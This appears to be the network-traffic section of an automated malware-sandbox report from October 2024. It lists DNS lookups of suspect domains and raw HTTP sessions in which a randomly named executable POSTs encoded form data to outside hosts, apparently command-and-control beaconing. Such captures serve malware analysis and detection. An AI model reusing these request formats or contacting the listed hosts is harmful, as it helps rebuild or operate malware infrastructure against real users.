                                                                                                                                                                                                              Oct 8, 2024 15:35:34.817804098 CEST192.168.2.91.1.1.10x6d0eStandard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:09.411092043 CEST192.168.2.91.1.1.10xe8faStandard query (0)www.mtcep.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.677227974 CEST192.168.2.91.1.1.10x6517Standard query (0)www.es-lidl.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:30.883127928 CEST192.168.2.91.1.1.10xf9dcStandard query (0)www.wajf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.457973957 CEST192.168.2.91.1.1.10x7fedStandard query (0)www.drivedoge.websiteA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.020536900 CEST192.168.2.91.1.1.10x84d4Standard query (0)www.torex33.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.488759995 CEST192.168.2.91.1.1.10xc729Standard query (0)www.broomeorchard.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.007184029 CEST192.168.2.91.1.1.10x47aeStandard query (0)www.wcq24.topA (IP address)IN (0x0001)false

                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Oct 8, 2024 15:33:32.439408064 CEST1.1.1.1192.168.2.90xa920Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.209781885 CEST1.1.1.1192.168.2.90xb2e9No error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.209781885 CEST1.1.1.1192.168.2.90xb2e9No error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.209781885 CEST1.1.1.1192.168.2.90xb2e9No error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.895015001 CEST1.1.1.1192.168.2.90x22bcNo error (0)www.falconclub.online74.208.236.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.455951929 CEST1.1.1.1192.168.2.90x22f8No error (0)www.promasterev.shoppromasterev.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.455951929 CEST1.1.1.1192.168.2.90x22f8No error (0)promasterev.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.455951929 CEST1.1.1.1192.168.2.90x22f8No error (0)promasterev.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.601962090 CEST1.1.1.1192.168.2.90xc611No error (0)www.childlesscatlady.todaychildlesscatlady.todayCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.601962090 CEST1.1.1.1192.168.2.90xc611No error (0)childlesscatlady.today3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.601962090 CEST1.1.1.1192.168.2.90xc611No error (0)childlesscatlady.today15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.470103979 CEST1.1.1.1192.168.2.90x99e7No error (0)www.animekuid.xyzanimekuid.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.470103979 CEST1.1.1.1192.168.2.90x99e7No error (0)animekuid.xyz203.175.9.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.533149004 CEST1.1.1.1192.168.2.90x46b8No error (0)www.doggieradio.netdoggieradio.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.533149004 CEST1.1.1.1192.168.2.90x46b8No error (0)doggieradio.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.533149004 CEST1.1.1.1192.168.2.90x46b8No error (0)doggieradio.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:35:06.743119955 CEST1.1.1.1192.168.2.90x90daNo error (0)www.demovix.xyz199.192.19.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.736262083 CEST1.1.1.1192.168.2.90xaf9aNo error (0)www.palcoconnector.net208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:35:35.358998060 CEST1.1.1.1192.168.2.90x6d0eNo error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:09.426366091 CEST1.1.1.1192.168.2.90xe8faName error (3)www.mtcep.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.723215103 CEST1.1.1.1192.168.2.90x6517No error (0)www.es-lidl.onlinees-lidl.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.723215103 CEST1.1.1.1192.168.2.90x6517No error (0)es-lidl.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.345695972 CEST1.1.1.1192.168.2.90xf9dcNo error (0)www.wajf.netcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.345695972 CEST1.1.1.1192.168.2.90xf9dcNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.345695972 CEST1.1.1.1192.168.2.90xf9dcNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.91.127.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.345695972 CEST1.1.1.1192.168.2.90xf9dcNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.194.102.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.576714993 CEST1.1.1.1192.168.2.90x7fedNo error (0)www.drivedoge.website195.161.68.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.107594967 CEST1.1.1.1192.168.2.90x84d4No error (0)www.torex33.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.500932932 CEST1.1.1.1192.168.2.90xc729No error (0)www.broomeorchard.xyz15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.500932932 CEST1.1.1.1192.168.2.90xc729No error (0)www.broomeorchard.xyz3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.603116035 CEST1.1.1.1192.168.2.90x47aeNo error (0)www.wcq24.topwcq24.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.603116035 CEST1.1.1.1192.168.2.90x47aeNo error (0)wcq24.top154.23.184.240A (IP address)IN (0x0001)false

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • www.multileveltravel.world
                                                                                                                                                                                                              • www.falconclub.online
                                                                                                                                                                                                              • www.promasterev.shop
                                                                                                                                                                                                              • www.childlesscatlady.today
                                                                                                                                                                                                              • www.animekuid.xyz
                                                                                                                                                                                                              • www.doggieradio.net
                                                                                                                                                                                                              • www.demovix.xyz
                                                                                                                                                                                                              • www.palcoconnector.net
                                                                                                                                                                                                              • www.shanhaiguan.net
                                                                                                                                                                                                              • www.es-lidl.online
                                                                                                                                                                                                              • www.wajf.net
                                                                                                                                                                                                              • www.drivedoge.website
                                                                                                                                                                                                              • www.torex33.online

                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.9605493.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.230236053 CEST483OUTGET /hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.multileveltravel.world
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:33:37.817831039 CEST395INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:33:37 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 255
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 26 74 70 54 64 3d 47 7a 46 33 6f 37 65 7a 61 31 64 55 34 46 34 37 36 63 48 48 65 72 61 6c 2f 63 59 4a 47 2b 46 43 77 67 4a 4d 49 7a 30 48 50 6c 66 72 53 43 4d 42 44 56 75 51 66 6a 47 4e 6d 78 42 64 37 6d 6f 56 72 68 43 47 59 32 68 59 37 4d 43 67 4b 2b 4d 6e 65 6b 67 73 74 54 70 30 7a 33 5a 6a 63 50 39 72 6b 36 38 65 6b 34 33 42 48 71 51 44 43 66 63 41 65 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg=="}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.96055174.208.236.25801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.914947987 CEST746OUTPOST /sld7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.falconclub.online
                                                                                                                                                                                                              Origin: http://www.falconclub.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.falconclub.online/sld7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4e 62 6f 6d 4a 68 41 38 4b 38 30 62 75 50 4c 78 48 52 42 46 45 49 5a 52 67 4a 6b 6e
                                                                                                                                                                                                              Data Ascii: tpTd=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bNbomJhA8K80buPLxHRBFEIZRgJkn
                                                                                                                                                                                                              Oct 8, 2024 15:33:53.420114040 CEST580INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:33:53 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.96055274.208.236.25801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.464616060 CEST770OUTPOST /sld7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.falconclub.online
                                                                                                                                                                                                              Origin: http://www.falconclub.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.falconclub.online/sld7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 61 49 61 4c 4f 38 36 74 70 4b 47 33 70 74 4f 49 45 4f 70 34 42 4c 7a 53 52 51 68 4b 64 76 4b 61 68 34 79 68 77 71 31 32 56 56 72 70 58 50 68 50 33 75 32 35 70 6a 64 6c 31 77 30 2f 4d 45 79 77 68 74 31 4b 44 4b 39 71 66 67 65 4c 76 44 71 41 43 6e 4d 71 73 49 6f 38 54 66 4b 41 48 51 65 66 53 46 4a 38 59 6e 68 67 6a 70 31 48 43 6d 39 4e 56 46 43 4d 6d 78 4a 5a 6b 30 41 58 45 71 54 76 67 72 67 4f 72 76 57 6a 49 65 52 66 5a 32 6e 75 74 50 62 61 49 31 4a 4a 38 6c 41 2f 4c 6c 49 67 4e 61 35 79 4b 5a 34 67 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoaIaLO86tpKG3ptOIEOp4BLzSRQhKdvKah4yhwq12VVrpXPhP3u25pjdl1w0/MEywht1KDK9qfgeLvDqACnMqsIo8TfKAHQefSFJ8Ynhgjp1HCm9NVFCMmxJZk0AXEqTvgrgOrvWjIeRfZ2nutPbaI1JJ8lA/LlIgNa5yKZ4g==
                                                                                                                                                                                                              Oct 8, 2024 15:33:55.974159956 CEST580INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:33:55 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.96055974.208.236.25801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.003472090 CEST1783OUTPOST /sld7/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.falconclub.online
                                                                                                                                                                                                              Origin: http://www.falconclub.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.falconclub.online/sld7/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 53 49 62 34 32 38 37 4f 42 4b 46 33 70 74 56 49 45 4c 70 34 42 53 7a 53 49 59 68 4b 51 51 4b 59 70 34 77 44 6f 71 39 69 35 56 69 70 58 50 2b 66 33 74 72 70 70 4d 64 6c 6c 38 30 2f 63 45 79 77 68 74 31 49 72 4b 2b 37 66 67 59 4c 76 41 70 41 43 37 49 71 74 56 6f 38 4b 69 4b 44 72 71 65 4d 61 46 4d 73 49 6e 67 53 37 70 39 48 43 34 2b 4e 55 59 43 4a 2b 71 4a 5a 34 4a 41 58 59 45 54 76 59 72 6b 59 61 32 41 67 34 65 48 4d 46 6b 6e 39 52 39 5a 4d 73 67 50 64 4d 68 59 71 48 6c 64 67 6f 4d 37 43 62 75 73 58 64 39 57 67 75 45 42 6f 73 2b 45 58 58 47 75 37 36 6e 63 6f 7a 37 2b 4b 44 41 61 50 72 58 59 64 58 74 75 64 45 68 77 72 4b 33 45 67 4f 76 53 6e 64 47 68 54 35 51 31 48 39 35 30 77 44 58 4f 47 58 53 77 2b 68 75 4b 32 56 6c 34 73 77 71 38 64 44 34 58 34 59 4e 43 46 52 37 78 71 50 6c 70 6d 57 55 50 67 67 55 68 47 55 6c 55 35 4b 2b 63 4f 62 4a 56 69 6b 43 55 49 41 47 49 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoSIb4287OBKF3ptVIELp4BSzSIYhKQQKYp4wDoq9i5VipXP+f3trppMdll80/cEywht1IrK+7fgYLvApAC7IqtVo8KiKDrqeMaFMsIngS7p9HC4+NUYCJ+qJZ4JAXYETvYrkYa2Ag4eHMFkn9R9ZMsgPdMhYqHldgoM7CbusXd9WguEBos+EXXGu76ncoz7+KDAaPrXYdXtudEhwrK3EgOvSndGhT5Q1H950wDXOGXSw+huK2Vl4swq8dD4X4YNCFR7xqPlpmWUPggUhGUlU5K+cObJVikCUIAGIUeO+RyC5htnlaG2Aio/2p0GCfl2Bgx9Ui95MUOpSkyCjtMw5HY3B8ZMzSu9Xay50vPYKg1f+HkgaS9ImNHNvY7gRSHxPFgmZ0PYoE1FceWbdxCbhvx7TgPycj4aXHP3XgKerxqCUagCV1Ri6sCCx0CFsLxVQ+hw471KIOubbh1w1eGJ5WnSD/v22KMWVwyoo2GzCSUmWEn8QmjvMXnRf+6k2TDIJhlug4WBKVVnu22lBwKJJpu3MP0Bc4BAwDBipm73Rk7+mLyckfTEp33tr4d7m8tIlLehXwBnBUyNBDzAuQWVsj04R+Ip8jgs0vUdSUrD434DR7wM0KMTdEdRhEZNbGfMTZcj/mw49HRoekD67jvPDsu23d/KIa/4o+1byPPeui6/FhVeOeFPTpkWDVx04wI32YyW4RxX9skfJUAMhdsePEwL7i27QxS2qavDvplF95dECHBUn75xJPYKvLEodRKm/uZnQPxn7wJu+7NFo7/e6I326FFG/z/0tCC4dIikJ57NV8lfhRd9LzepbQwDTEcI1LRk9o/JZaFCbL64g3Lqx+qtp/nfuM7TPXZ4UDmNvmTmj9O5B72Jc2g9ILeb8akBwNlEOHnG3JvdLfb6rNpX4k4NJygZRbtb+SOxsMzFO29fCWxJj2k39bAMgBX6FHt6lIXmM5G [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:33:58.518306971 CEST580INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:33:58 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.96057574.208.236.25801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:00.898246050 CEST478OUTGET /sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.falconclub.online
                                                                                                                                                                                                              Connection: close
